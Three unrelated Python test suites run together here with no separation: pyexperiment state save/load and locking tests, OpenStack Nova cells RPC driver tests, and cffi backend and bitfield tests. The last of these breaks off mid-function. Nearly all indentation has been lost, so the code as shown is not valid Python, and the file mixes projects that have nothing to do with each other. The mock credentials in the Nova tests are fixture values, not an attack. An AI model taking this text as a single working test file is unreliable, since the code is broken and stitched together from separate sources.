"""Tests the state module of pyexperiment
Written by Peter Duerr
"""
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
import unittest
import tempfile
import os
import io
import six
import shutil
import multiprocessing
import numpy as np
import lockfile
from time import sleep
from datetime import datetime
# For python2.x compatibility
from six.moves import range # pylint: disable=redefined-builtin, import-error
from pyexperiment import state
from pyexperiment.State import StateHandler
from pyexperiment.utils.stdout_redirector import stdout_redirector
class StateTester(unittest.TestCase):
"""ABC for state's test fixtures
"""
def setUp(self):
"""Setup test fixture
"""
self.list_val = [1, 2, 'a', 1.2]
self.dict_val = {'a': 1, 1: 2.3}
self.int_val = 123
def tearDown(self):
"""Teardown test fixture
"""
state.reset_instance()
def _setup_basic_state(self):
"""Setup test fixture
"""
state['list'] = self.list_val
state['dict'] = self.dict_val
state['values.int'] = self.int_val
class TestBasicState(StateTester):
"""Test basic functionality of pyexperiment's state
"""
def test_set_get_first_level(self):
"""Test setting, getting state at the lowest level
"""
state['a'] = 123
self.assertEqual(state['a'], 123)
def test_set_get_higher_levels(self):
"""Test setting, getting state at the higher levels
"""
state['a.b'] = 123
state['c.d.e'] = 345
self.assertEqual(state['a.b'], 123)
self.assertEqual(state['c.d.e'], 345)
def test_get_section(self):
"""Test getting a section of the state
"""
state['a.a'] = 12
state['a.b'] = 13
state['c'] = 24
self.assertIn('a', state)
section_a = state['a']
self.assertIn('a', section_a)
self.assertIn('b', section_a)
self.assertNotIn('c', section_a)
self.assertEqual(section_a['a'], 12)
self.assertEqual(section_a['b'], 13)
def test_get_inexistent(self):
"""Test getting non-existent value
"""
self.assertRaises(KeyError, state.__getitem__, 'a')
def test_show(self):
"""Test showing the state
"""
state['a.b'] = 12
state['bla.bli'] = 13
buf = io.StringIO()
with stdout_redirector(buf):
state.show()
self.assertNotEqual(len(buf.getvalue()), 0)
self.assertRegexpMatches(buf.getvalue(), r"\[a\]")
self.assertRegexpMatches(buf.getvalue(), r"\[bla\]")
self.assertRegexpMatches(buf.getvalue(), r"b")
self.assertRegexpMatches(buf.getvalue(), r"bli")
self.assertRegexpMatches(buf.getvalue(), r"12")
self.assertRegexpMatches(buf.getvalue(), r"13")
def test_in_lazy(self):
"""Test checking for an attribute in a lazily loaded state
"""
self._setup_basic_state()
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('list', state)
state.load(temp.name, lazy=True)
self.assertIn('list', state)
def test_setting_increases_length(self):
"""Test setting items increases length
"""
self.assertEqual(len(state), 0)
state['a'] = 12
self.assertEqual(len(state), 1)
state['c.d.f'] = 13
self.assertEqual(len(state), 2)
def test_delete_from_state(self):
"""Test deleting a value from the state
"""
state['list'] = [1, 2, 3]
self.assertIn('list', state)
del state['list']
self.assertNotIn('list', state)
def test_delete_reduces_length(self):
"""Test deleting a value from the state reduces the length
"""
self._setup_basic_state()
no_items = len(state)
del state['list']
self.assertEqual(len(state), no_items - 1)
def test_delete_removes_key(self):
"""Test deleting a value from the state removes the item
"""
self._setup_basic_state()
del state['list']
self.assertNotIn('list', state.keys())
def test_show_lazy(self):
"""Test showing the state lazily loaded
"""
state['a.b'] = 12
buf = io.StringIO()
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state['a.b'] = 13
state.load(temp.name, lazy=True)
with stdout_redirector(buf):
state.show()
self.assertNotEqual(len(buf.getvalue()), 0)
self.assertRegexpMatches(buf.getvalue(), r"\[a\]")
self.assertRegexpMatches(buf.getvalue(), r"b")
self.assertRegexpMatches(buf.getvalue(), r"12")
if six.PY2:
self.assertNotRegexpMatches(buf.getvalue(), r"13")
elif six.PY3:
self.assertNotRegex( # pylint: disable=E1101
buf.getvalue(), r"13")
else:
raise RuntimeError("Python version not supported")
def test_show_nonexisting_noraise(self):
"""Test showing a state that does not exist
"""
buf = io.StringIO()
with stdout_redirector(buf):
state.show()
self.assertEqual(len(buf.getvalue()), 0)
def test_load_nonexisting(self):
"""Test loading a state that does not exist with error flag default
"""
temp = tempfile.NamedTemporaryFile(delete=False)
os.remove(temp.name)
self.assertRaises(IOError, state.load, temp.name, lazy=False)
def test_load_nonexisting_lazy(self):
"""Test loading a state that does not exist with error flag default
"""
temp = tempfile.NamedTemporaryFile(delete=False)
os.remove(temp.name)
self.assertRaises(IOError, state.load, temp.name, lazy=True)
def test_load_nonexisting_noraise(self):
"""Test loading a state that does not exist with error flag True
"""
temp = tempfile.NamedTemporaryFile(delete=False)
os.remove(temp.name)
state.load(temp.name, lazy=False, raise_error=False)
self.assertEqual(len(state), 0)
def test_load_nonexist_lazy_noraise(self):
"""Test loading a state that does not exist with error flag default
"""
temp = tempfile.NamedTemporaryFile(delete=False)
os.remove(temp.name)
state.load(temp.name, lazy=True, raise_error=False)
self.assertNotIn('foo', state)
def test_empty_keys(self):
"""Test getting the keys in an empty state
"""
self.assertEqual(len(state.keys()), 0)
def test_keys(self):
"""Test getting the keys in a state
"""
self._setup_basic_state()
self.assertEqual(len(state.keys()), 3)
self.assertIn('list', state.keys())
self.assertIn('dict', state.keys())
self.assertIn('values.int', state.keys())
def test_iterate_uninitialized(self):
"""Make sure iterating uninitialized state returns empty generator
"""
self.assertEqual(list(iter(state)), [])
class TestStateIO(StateTester):
"""Test save/load functionality of pyexperiment's state
"""
def test_save_load_file(self):
"""Test saving file and reloading yields identical values
"""
self._setup_basic_state()
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
# Write bogus info to state
state['list'] = 'foo'
state['dict'] = 'bar'
state['values.int'] = 43
state.load(temp.name, lazy=False)
# Get loaded data
list_val = state['list']
dict_val = state['dict']
int_val = state['values.int']
self.assertEqual(self.list_val, list_val)
self.assertEqual(self.dict_val, dict_val)
self.assertEqual(self.int_val, int_val)
    def test_load_wo_filename(self):
"""Test loading state without passing a filename
"""
self.assertRaises(RuntimeError, state.load)
def test_save_load_file_lazy(self):
"""Test saving file and reloading lazily yields identical values
"""
self._setup_basic_state()
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
# Write bogus info to state
state['list'] = 'foo'
state['dict'] = 'bar'
state['values.int'] = 43
state.load(temp.name, lazy=True)
list_val = state['list']
dict_val = state['dict']
int_val = state['values.int']
self.assertEqual(self.list_val, list_val)
self.assertEqual(self.dict_val, dict_val)
self.assertEqual(self.int_val, int_val)
def test_get_section_lazy(self):
"""Test getting a section of the state lazily
"""
state['a.a'] = 12
state['a.b'] = 13
state['c'] = 24
self.assertIn('a', state)
section_a = state['a']
self.assertIn('a', section_a)
self.assertIn('b', section_a)
self.assertNotIn('c', section_a)
self.assertEqual(section_a['a'], 12)
self.assertEqual(section_a['b'], 13)
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('a', state)
state.load(temp.name)
self.assertIn('a', state)
section_a = state['a']
self.assertIn('a', section_a)
self.assertIn('b', section_a)
self.assertNotIn('c', section_a)
self.assertEqual(section_a['a'], 12)
self.assertEqual(section_a['b'], 13)
def test_get_section_lazy2(self):
"""Test getting directly a section of the state lazily
"""
state['a.b'] = 12
self.assertIn('a.b', state)
self.assertEqual(state['a.b'], 12)
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
state.load(temp.name)
self.assertIn('a.b', state)
self.assertEqual(state['a.b'], 12)
def test_lazy_really_lazy(self):
"""Test lazy loading is really lazy
"""
self._setup_basic_state()
temp = tempfile.NamedTemporaryFile(delete=False)
temp2 = tempfile.NamedTemporaryFile(delete=False)
state.save(temp.name)
# Write bogus info to state
state['list'] = 'foo'
state['values.int'] = 43
# This should only load the keys
state.load(temp.name, lazy=True)
self.assertEqual(len(state.keys()), 3)
# This should raise an error
shutil.move(temp.name, temp2.name)
self.assertRaises(IOError, state.__getitem__, 'list')
shutil.copyfile(temp2.name, temp.name)
# Now it should work
list_val = state['list']
self.assertEqual(self.list_val, list_val)
# This should raise another error
shutil.move(temp.name, temp2.name)
self.assertRaises(IOError, state.__getitem__, 'values.int')
shutil.copyfile(temp2.name, temp.name)
# This should work again
int_val = state['values.int']
self.assertEqual(self.int_val, int_val)
os.remove(temp.name)
os.remove(temp2.name)
def test_save_rollover(self):
"""Test saving file with rollover
"""
# Write some stuff to the state
state['a'] = (-1) ** 2
state['b'] = (-1) ** 3
state['c'] = 41
with tempfile.NamedTemporaryFile() as temp:
# Save original state
state.save(temp.name, rotate_n_state_files=2)
for i in range(10):
# Write bogus info to state
state['a'] = i ** 2
state['b'] = i ** 3
state['c'] = 42 + i
state.save(temp.name, rotate_n_state_files=2)
# Load last file and check contents
state.load(temp.name + ".1", lazy=True)
self.assertEqual(state['a'], (i - 1) ** 2)
self.assertEqual(state['b'], (i - 1) ** 3)
self.assertEqual(state['c'], 42 + (i - 1))
if i > 0:
# Load previous to last file and check contents
state.load(temp.name + ".2", lazy=True)
self.assertEqual(state['a'], (i - 2) ** 2)
self.assertEqual(state['b'], (i - 2) ** 3)
self.assertEqual(state['c'], 42 + (i - 2))
# Load current state and check contents
state.load(temp.name, lazy=True)
self.assertEqual(state['a'], i ** 2)
self.assertEqual(state['b'], i ** 3)
self.assertEqual(state['c'], 42 + i)
# Remove temp files
os.remove(temp.name + ".1")
os.remove(temp.name + ".2")
def test_need_saving(self):
"""Test the state.need_saving method
"""
self._setup_basic_state()
self.assertTrue(state.need_saving())
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
self.assertFalse(state.need_saving())
state['list'] = 'foo2'
self.assertTrue(state.need_saving())
def test_no_unnecessary_save(self):
"""Test saving the state only saves when necessary
"""
self.assertFalse(state.need_saving())
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
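            # Nothing was written: an empty, unchanged state yields an
            # empty file.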
self.assertEqual(os.stat(temp.name).st_size, 0)
self.assertFalse(state.need_saving())
state['bla'] = 'bla'
self.assertTrue(state.need_saving())
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
self.assertNotEqual(os.stat(temp.name).st_size, 0)
self.assertFalse(state.need_saving())
def test_saving_deleted_value(self):
"""Test saving really deletes entry
"""
state['a'] = 12
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('a', state)
state.load(temp.name)
self.assertIn('a', state)
del state['a']
self.assertNotIn('a', state)
state.save(temp.name)
state.reset_instance()
self.assertNotIn('a', state)
state.load(temp.name)
self.assertNotIn('a', state)
def test_saving_unloaded_value(self):
"""Test saving does not delete unloaded values
"""
state['a'] = 12
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('a', state)
state.load(temp.name)
state['b'] = 12
state.save(temp.name)
state.reset_instance()
self.assertNotIn('a', state)
self.assertNotIn('b', state)
state.load(temp.name)
self.assertIn('a', state)
self.assertIn('b', state)
class TestStateEfficientIO(StateTester):
"""Test save/load functionality of pyexperiment's state for numpy arrays
"""
def tearDown(self):
"""Clean up after tests
"""
state.reset_instance()
def test_saving_loading_np_array(self):
"""Test saving and loading a numpy array
"""
random = np.random.rand(100)
state['random'] = random
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('random', state)
state.load(temp.name, lazy=False)
self.assertTrue((random == state['random']).all())
def test_saving_loading_np_array2(self):
"""Test saving and loading numpy arrays of higher dimension
"""
random1 = np.random.rand(321, 123)
random2 = np.random.randint(0, 100, (123, 345))
state['random1'] = random1
state['random2'] = random2
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('random1', state)
self.assertNotIn('random2', state)
state.load(temp.name, lazy=False)
self.assertTrue((random1 == state['random1']).all())
self.assertTrue((random2 == state['random2']).all())
self.assertEqual(state['random1'].shape, random1.shape)
self.assertEqual(state['random2'].shape, random2.shape)
self.assertEqual(state['random1'].dtype, random1.dtype)
self.assertEqual(state['random2'].dtype, random2.dtype)
def test_saving_loading_lazy_array(self):
"""Test saving and loading a numpy array
"""
random = np.random.rand(100)
state['random'] = random
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('random', state)
state.load(temp.name)
self.assertTrue((random == state['random']).all())
def test_saving_list_performance(self):
"""Test saving a list and make sure it's reasonably fast
"""
random = np.random.randint(0, 255, 1024*1024).tolist()
state['random'] = random
with tempfile.NamedTemporaryFile() as temp:
tic = datetime.now()
state.save(temp.name)
toc = datetime.now()
self.assertTrue((toc - tic).total_seconds() < 0.5)
def test_loading_list_performance(self):
"""Test loading a list and make sure it's reasonably fast
"""
random = np.random.randint(0, 255, 1024*1024).tolist()
state['random'] = random
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('random', state)
tic = datetime.now()
state.load(temp.name)
toc = datetime.now()
self.assertTrue((toc - tic).total_seconds() < 0.5)
def test_saving_numpy_performance(self):
"""Test saving a numpy array and make sure it's reasonably fast
"""
random = np.array(
np.random.randint(0, 255, 1024*1024))
state['random'] = random
with tempfile.NamedTemporaryFile() as temp:
tic = datetime.now()
state.save(temp.name)
toc = datetime.now()
self.assertTrue((toc - tic).total_seconds() < 0.5)
def test_loading_numpy_performance(self):
"""Test loading a numpy array and make sure it's reasonably fast
"""
random = np.array(
np.random.randint(0, 255, 1024*1024))
state['random'] = random
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
self.assertNotIn('random', state)
tic = datetime.now()
state.load(temp.name)
toc = datetime.now()
self.assertTrue((toc - tic).total_seconds() < 0.5)
class TestStateHandler(unittest.TestCase):
"""Test the state's StateHandler
"""
def tearDown(self):
"""Clean up after the test
"""
state.reset_instance()
def test_with_block_does_not_load(self):
"""Test the basic with-block of the StateHandler does not load anything
"""
state['a'] = 1
self.assertEqual(len(state), 1)
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
with StateHandler(temp.name):
self.assertEqual(len(state), 0)
def test_with_block_does_not_save(self):
"""Test the basic with-block of the StateHandler does not save anything
"""
state['a'] = 1
self.assertEqual(len(state), 1)
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
with StateHandler(temp.name):
state['a'] = 42
state.reset_instance()
state.load(temp.name)
self.assertEqual(state['a'], 1)
def test_with_block_does_load(self):
"""Test the with-block of the StateHandler loads if required
"""
state['a'] = 123
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
with StateHandler(temp.name, load=True):
self.assertEqual(len(state), 1)
self.assertEqual(state['a'], 123)
def test_with_block_does_save(self):
"""Test the with-block of the StateHandler saves if required
"""
state['a'] = 1
with tempfile.NamedTemporaryFile() as temp:
state.save(temp.name)
state.reset_instance()
with StateHandler(temp.name, save=True):
state['a'] = 42
state.reset_instance()
state.load(temp.name)
self.assertEqual(state['a'], 42)
def test_with_block_locks(self):
"""Test the with-block of the StateHandler locks the state
"""
state['a'] = 123
with tempfile.NamedTemporaryFile() as temp:
def other_op():
"""Function to run in another process"""
StateHandler.STATE_LOCK_TIMEOUT = 0.001
other_handler = StateHandler(temp.name, load=True)
self.assertRaises(RuntimeError,
other_handler.__enter__)
state.save(temp.name)
state.reset_instance()
with StateHandler(temp.name, load=True):
process = multiprocessing.Process(target=other_op)
process.start()
process.join()
def test_other_process_locks(self):
"""Test locking the state in another process locks
"""
with tempfile.NamedTemporaryFile() as temp:
def other_op(queue):
"""Lock the lockfile, then wait for poison pill
"""
lockfile.FileLock(temp.name).acquire()
while queue.empty():
sleep(0.01)
lockfile.FileLock(temp.name).release()
queue = multiprocessing.Queue()
process = multiprocessing.Process(target=other_op,
args=(queue,))
process.start()
while not lockfile.FileLock(temp.name).is_locked():
sleep(0.01)
StateHandler.STATE_LOCK_TIMEOUT = 0.001
handler = StateHandler(temp.name, load=False)
self.assertRaises(RuntimeError, handler.lock)
queue.put(None)
process.join()
if __name__ == '__main__':
unittest.main()
# Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For Cells RPC Communication Driver
"""
import mock
from mox3 import mox
from oslo_config import cfg
import oslo_messaging
from nova.cells import messaging
from nova.cells import rpc_driver
from nova import context
from nova import rpc
from nova import test
from nova.tests.unit.cells import fakes
CONF = cfg.CONF
CONF.import_opt('rpc_driver_queue_base', 'nova.cells.rpc_driver',
group='cells')
class CellsRPCDriverTestCase(test.NoDBTestCase):
"""Test case for Cells communication via RPC."""
def setUp(self):
super(CellsRPCDriverTestCase, self).setUp()
fakes.init(self)
self.ctxt = context.RequestContext('fake', 'fake')
self.driver = rpc_driver.CellsRPCDriver()
def test_start_servers(self):
self.flags(rpc_driver_queue_base='cells.intercell42', group='cells')
fake_msg_runner = fakes.get_message_runner('api-cell')
class FakeInterCellRPCDispatcher(object):
def __init__(_self, msg_runner):
self.assertEqual(fake_msg_runner, msg_runner)
self.stubs.Set(rpc_driver, 'InterCellRPCDispatcher',
FakeInterCellRPCDispatcher)
self.mox.StubOutWithMock(rpc, 'get_server')
for message_type in messaging.MessageRunner.get_message_types():
topic = 'cells.intercell42.' + message_type
target = oslo_messaging.Target(topic=topic, server=CONF.host)
endpoints = [mox.IsA(FakeInterCellRPCDispatcher)]
rpcserver = self.mox.CreateMockAnything()
rpc.get_server(target, endpoints=endpoints).AndReturn(rpcserver)
rpcserver.start()
self.mox.ReplayAll()
self.driver.start_servers(fake_msg_runner)
def test_stop_servers(self):
call_info = {'stopped': []}
class FakeRPCServer(object):
def stop(self):
call_info['stopped'].append(self)
        fake_servers = [FakeRPCServer() for x in range(5)]
self.driver.rpc_servers = fake_servers
self.driver.stop_servers()
self.assertEqual(fake_servers, call_info['stopped'])
def test_create_transport_once(self):
# should only construct each Transport once
rpcapi = self.driver.intercell_rpcapi
transport_url = 'amqp://fakeurl'
next_hop = fakes.FakeCellState('cellname')
next_hop.db_info['transport_url'] = transport_url
# first call to _get_transport creates a oslo.messaging.Transport obj
with mock.patch.object(oslo_messaging, 'get_transport') as get_trans:
transport = rpcapi._get_transport(next_hop)
get_trans.assert_called_once_with(rpc_driver.CONF, transport_url,
rpc.TRANSPORT_ALIASES)
self.assertIn(transport_url, rpcapi.transports)
self.assertEqual(transport, rpcapi.transports[transport_url])
# subsequent calls should return the pre-created Transport obj
transport2 = rpcapi._get_transport(next_hop)
self.assertEqual(transport, transport2)
def test_send_message_to_cell_cast(self):
msg_runner = fakes.get_message_runner('api-cell')
cell_state = fakes.get_cell_state('api-cell', 'child-cell2')
message = messaging._TargetedMessage(msg_runner,
self.ctxt, 'fake', {}, 'down', cell_state, fanout=False)
expected_server_params = {'hostname': 'rpc_host2',
'password': 'password2',
'port': 3092,
'username': 'username2',
'virtual_host': 'rpc_vhost2'}
expected_url = ('rabbit://%(username)s:%(password)s@'
'%(hostname)s:%(port)d/%(virtual_host)s' %
expected_server_params)
def check_transport_url(cell_state):
return cell_state.db_info['transport_url'] == expected_url
rpcapi = self.driver.intercell_rpcapi
rpcclient = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(rpcapi, '_get_client')
rpcapi._get_client(
mox.Func(check_transport_url),
'cells.intercell.targeted').AndReturn(rpcclient)
rpcclient.cast(mox.IgnoreArg(), 'process_message',
message=message.to_json())
self.mox.ReplayAll()
self.driver.send_message_to_cell(cell_state, message)
def test_send_message_to_cell_fanout_cast(self):
msg_runner = fakes.get_message_runner('api-cell')
cell_state = fakes.get_cell_state('api-cell', 'child-cell2')
message = messaging._TargetedMessage(msg_runner,
self.ctxt, 'fake', {}, 'down', cell_state, fanout=True)
expected_server_params = {'hostname': 'rpc_host2',
'password': 'password2',
'port': 3092,
'username': 'username2',
'virtual_host': 'rpc_vhost2'}
expected_url = ('rabbit://%(username)s:%(password)s@'
'%(hostname)s:%(port)d/%(virtual_host)s' %
expected_server_params)
def check_transport_url(cell_state):
return cell_state.db_info['transport_url'] == expected_url
rpcapi = self.driver.intercell_rpcapi
rpcclient = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(rpcapi, '_get_client')
rpcapi._get_client(
mox.Func(check_transport_url),
'cells.intercell.targeted').AndReturn(rpcclient)
rpcclient.prepare(fanout=True).AndReturn(rpcclient)
rpcclient.cast(mox.IgnoreArg(), 'process_message',
message=message.to_json())
self.mox.ReplayAll()
self.driver.send_message_to_cell(cell_state, message)
def test_rpc_topic_uses_message_type(self):
self.flags(rpc_driver_queue_base='cells.intercell42', group='cells')
msg_runner = fakes.get_message_runner('api-cell')
cell_state = fakes.get_cell_state('api-cell', 'child-cell2')
message = messaging._BroadcastMessage(msg_runner,
self.ctxt, 'fake', {}, 'down', fanout=True)
message.message_type = 'fake-message-type'
expected_server_params = {'hostname': 'rpc_host2',
'password': 'password2',
'port': 3092,
'username': 'username2',
'virtual_host': 'rpc_vhost2'}
expected_url = ('rabbit://%(username)s:%(password)s@'
'%(hostname)s:%(port)d/%(virtual_host)s' %
expected_server_params)
def check_transport_url(cell_state):
return cell_state.db_info['transport_url'] == expected_url
rpcapi = self.driver.intercell_rpcapi
rpcclient = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(rpcapi, '_get_client')
rpcapi._get_client(
mox.Func(check_transport_url),
'cells.intercell42.fake-message-type').AndReturn(rpcclient)
rpcclient.prepare(fanout=True).AndReturn(rpcclient)
rpcclient.cast(mox.IgnoreArg(), 'process_message',
message=message.to_json())
self.mox.ReplayAll()
self.driver.send_message_to_cell(cell_state, message)
def test_process_message(self):
msg_runner = fakes.get_message_runner('api-cell')
dispatcher = rpc_driver.InterCellRPCDispatcher(msg_runner)
message = messaging._BroadcastMessage(msg_runner,
self.ctxt, 'fake', {}, 'down', fanout=True)
call_info = {}
def _fake_message_from_json(json_message):
call_info['json_message'] = json_message
self.assertEqual(message.to_json(), json_message)
return message
def _fake_process():
call_info['process_called'] = True
self.stubs.Set(msg_runner, 'message_from_json',
_fake_message_from_json)
self.stubs.Set(message, 'process', _fake_process)
dispatcher.process_message(self.ctxt, message.to_json())
self.assertEqual(message.to_json(), call_info['json_message'])
self.assertTrue(call_info['process_called'])
import py, sys, platform
import pytest
from testing.cffi0 import backend_tests, test_function, test_ownlib
from cffi import FFI
import _cffi_backend
class TestFFI(backend_tests.BackendTests,
test_function.TestFunction,
test_ownlib.TestOwnLib):
TypeRepr = "<ctype '%s'>"
@staticmethod
def Backend():
return _cffi_backend
def test_not_supported_bitfield_in_result(self):
ffi = FFI(backend=self.Backend())
ffi.cdef("struct foo_s { int a,b,c,d,e; int x:1; };")
e = py.test.raises(NotImplementedError, ffi.callback,
"struct foo_s foo(void)", lambda: 42)
assert str(e.value) == ("struct foo_s(*)(): "
"callback with unsupported argument or return type or with '...'")
def test_inspecttype(self):
ffi = FFI(backend=self.Backend())
assert ffi.typeof("long").kind == "primitive"
assert ffi.typeof("long(*)(long, long**, ...)").cname == (
"long(*)(long, long * *, ...)")
assert ffi.typeof("long(*)(long, long**, ...)").ellipsis is True
def test_new_handle(self):
ffi = FFI(backend=self.Backend())
o = [2, 3, 4]
p = ffi.new_handle(o)
assert ffi.typeof(p) == ffi.typeof("void *")
assert ffi.from_handle(p) is o
assert ffi.from_handle(ffi.cast("char *", p)) is o
py.test.raises(RuntimeError, ffi.from_handle, ffi.NULL)
class TestBitfield:
def check(self, source, expected_ofs_y, expected_align, expected_size):
# NOTE: 'expected_*' is the numbers expected from GCC.
# The numbers expected from MSVC are not explicitly written
# in this file, and will just be taken from the compiler.
ffi = FFI()
ffi.cdef("struct s1 { %s };" % source)
ctype = ffi.typeof("struct s1")
# verify the information with gcc
ffi1 = FFI()
ffi1.cdef("""
static const int Gofs_y, Galign, Gsize;
struct s1 *try_with_value(int fieldnum, long long value);
""")
fnames = [name for name, cfield in ctype.fields
if name and cfield.bitsize > 0]
setters = ['case %d: s.%s = value; break;' % iname
for iname in enumerate(fnames)]
lib = ffi1.verify("""
struct s1 { %s };
struct sa { char a; struct s1 b; };
#define Gofs_y offsetof(struct s1, y)
#define Galign offsetof(struct sa, b)
#define Gsize sizeof(struct s1)
struct s1 *try_with_value(int fieldnum, long long value)
{
static struct s1 s;
memset(&s, 0, sizeof(s));
switch (fieldnum) { %s }
return &s;
}
""" % (source, ' '.join(setters)))
if sys.platform == 'win32':
expected_ofs_y = lib.Gofs_y
expected_align = lib.Galign
expected_size = lib.Gsize
else:
assert (lib.Gofs_y, lib.Galign, lib.Gsize) == (
expected_ofs_y, expected_align, expected_size)
# the real test follows
assert ffi.offsetof("struct s1", "y") == expected_ofs_y
assert ffi.alignof("struct s1") == expected_align
assert ffi.sizeof("struct s1") == expected_size
# compare the actual storage of the two
for name, cfield in ctype.fields:
if cfield.bitsize < 0 or not name:
continue
if int(ffi.cast(cfield.type, -1)) == -1: # signed
min_value = -(1 << (cfield.bitsize-1))
max_value = (1 << (cfield.bitsize-1)) - 1
else:
min_value = 0
max_value = (1 << cfield.bitsize) - 1
for t in [1, 2, 4, 8, 16, 128, 2813, 89728, 981729,
-1,-2,-4,-8,-16,-128,-2813,-89728,-981729]:
if min_value <= t <= max_value:
self._fieldcheck(ffi, lib, fnames, name, t)
def _fieldcheck(self, ffi, lib, fnames, name, value):
s = ffi.new("struct s1 *")
setattr(s, name, value)
assert getattr(s, name) == value
raw1 = ffi.buffer(s)[:]
t = lib.try_with_value(fnames.index(name), value)
raw2 = ffi.buffer(t, len(raw1))[:]
assert raw1 == raw2
def test_bitfield_basic(self):
self.check("int a; int b:9; int c:20; int y;", 8, 4, 12)
self.check("int a; short b:9; short c:7; int y;", 8, 4, 12)
self.check("int a; short b:9; short c:9; int y;", 8, 4, 12)
def test_bitfield_reuse_if_enough_space(self):
self.check("int a:2; char y;", 1, 4, 4)
self.check("int a:1; char b ; int c:1; char y;", 3, 4, 4)
self.check("int a:1; char b:8; int c:1; char y;", 3, 4, 4)
self.check("char a; int b:9; char y;", 3, 4, 4)
self.check("char a; short b:9; char y;", 4, 2, 6)
self.check("int a:2; char b:6; char y;", 1, 4, 4)
self.check("int a:2; char b:7; char y;", 2, 4, 4)
self.check("int a:2; short b:15; char c:2; char y;", 5, 4, 8)
self.check("int a:2; char b:1; char c:1; char y;", 1, 4, 4)
@pytest.mark.skipif("platform.machine().startswith(('arm', 'aarch64'))")
def test_bitfield_anonymous_no_align(self):
L = FFI().alignof("long long")
self.check("char y; int :1;", 0, 1, 2)
self.check("char x; int z:1; char y;", 2, 4, 4)
self.check("char x; int :1; char y;", 2, 1, 3)
self.check("char x; long long z:48; char y;", 7, L, 8)
self.check("char x; long long :48; char y;", 7, 1, 8)
self.check("char x; long long z:56; char y;", 8, L, 8 + L)
self.check("char x; long long :56; char y;", 8, 1, 9)
self.check("char x; long long z:57; char y;", L + 8, L, L + 8 + L)
self.check("char x; long long :57; char y;", L + 8, 1, L + 9)
@pytest.mark.skipif(
"not platform.machine().startswith(('arm', 'aarch64'))")
def test_bitfield_anonymous_align_arm(self):
L = FFI().alignof("long long")
self.check("char y; int :1;", 0, 4, 4)
self.check("char x; int z:1; char y;", 2, 4, 4)
self.check("char x; int :1; char y;", 2, 4, 4)
self.check("char x; long long z:48; char y;", 7, L, 8)
self.check("char x; long long :48; char y;", 7, 8, 8)
self.check("char x; long long z:56; char y;", 8, L, 8 + L)
self.check("char x; long long :56; char y;", 8, L, 8 + L)
self.check("char x; long long z:57; char y;", L + 8, L, L + 8 + L)
self.check("char x; long long :57; char y;", L + 8, L, L + 8 + L)
@pytest.mark.skipif("platform.machine().startswith(('arm', 'aarch64'))")
def test_bitfield_zero(self):
L = FFI().alignof("long long")
self.check("char y; int :0;", 0, 1, 4)
self.check("char x; int :0; char y;", 4, 1, 5)
self.check("char x; int :0; int :0; char y;", 4, 1, 5)
self.check("char x; long long :0; char y;", L, 1, L + 1)
self.check("short x, y; int :0; int :0;", 2, 2, 4)
self.check("char x; int :0; short b:1; char y;", 5, 2, 6)
self.check("int a:1; int :0; int b:1; char y;", 5, 4, 8)
@pytest.mark.skipif(
"not platform.machine().startswith(('arm', 'aarch64'))")
def test_bitfield_zero_arm(self):
L = FFI().alignof("long long")
self.check("char y; int :0;", 0, 4, 4)
self.check("char x; int :0; char y;", 4, 4, 8)
self.check("char x; int :0; int :0; char y;", 4, 4, 8)
self.check("char x; long long :0; char y;", L, 8, L + 8)
self.check("short x, y; int :0; int :0;", 2, 4, 4)
self.check("char x; int :0; short b:1; char y;", 5, 4, 8)
self.check("int a:1; int :0; int b:1; char y;", 5, 4, 8)
def test_error_cases(self):
ffi = FFI()
py.test.raises(TypeError,
'ffi.cdef("struct s1 { float x:1; };"); ffi.new("struct s1 *")')
py.test.raises(TypeError,
'ffi.cdef("struct s2 { char x:0; };"); ffi.new("struct s2 *")')
py.test.raises(TypeError,
'ffi.cdef("struct s3 { char x:9; };"); ffi.new("struct s3 *")')
def test_struct_with_typedef(self):
ffi = FFI()
ffi.cdef("typedef struct { float x; } foo_t;")
p = ffi.new("foo_t *", [5.2])
assert repr(p).startswith("<cdata 'foo_t *' ")
def test_struct_array_no_length(self):
ffi = FFI()
ffi.cdef("struct foo_s { int x; int a[]; };")
p = ffi.new("struct foo_s *", [100, [200, 300, 400]])
assert p.x == 100
assert ffi.typeof(p.a) is ffi.typeof("int *") # no length available
assert p.a[0] == 200
assert p.a[1] == 300
assert p.a[2] == 400
@pytest.mark.skipif("sys.platform != 'win32'")
def test_getwinerror(self):
